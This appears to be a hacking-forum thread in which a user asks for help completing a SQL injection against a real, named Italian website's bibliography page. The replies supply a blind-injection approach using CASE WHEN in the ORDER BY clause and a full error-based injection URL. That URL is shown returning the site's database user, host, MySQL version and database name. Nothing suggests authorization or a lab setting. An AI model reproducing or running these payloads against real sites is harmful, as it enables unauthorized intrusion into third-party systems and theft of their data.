hi,
the sqlI is this:
http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine='11

But it's sò so strange because when i tried to find the columns with ORDER BY, (http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=11+order+by+1--) but the error that its printed was different from usual.
But trying to increase the value of the variable "s_ordine, when i was arrived at 12... PUFF "Database Error: Unknown column '12' in 'order clause' "

Then in conclusion:
http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=11 [true]
http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=12 [false]

The query is: ORDER BY ($ s_ordine) [OwN SQL CODE] LIMIT 0,8;


How i complete this Injection?
Someone could help me find the correct syntax?

Thx
Bye
Nerder

this becouse ure injecting in an ORDER BY clause and it sort by the input... u cant do normal sqli after order by so u must bsqli with the case when statemant like that => (case when (1=0) then name else email end)

where name and email are the current table's columns

use error based method

http://www.vittoriosgarbi.it/site/ita/bibliografia-completa.php?s_ordine=11 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user(),0x3a,version(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Database Error: Duplicate entry '~'sgarbi@w455.widhost.net:5.0.51a-log:C29315_sgarbi'~1' for key 1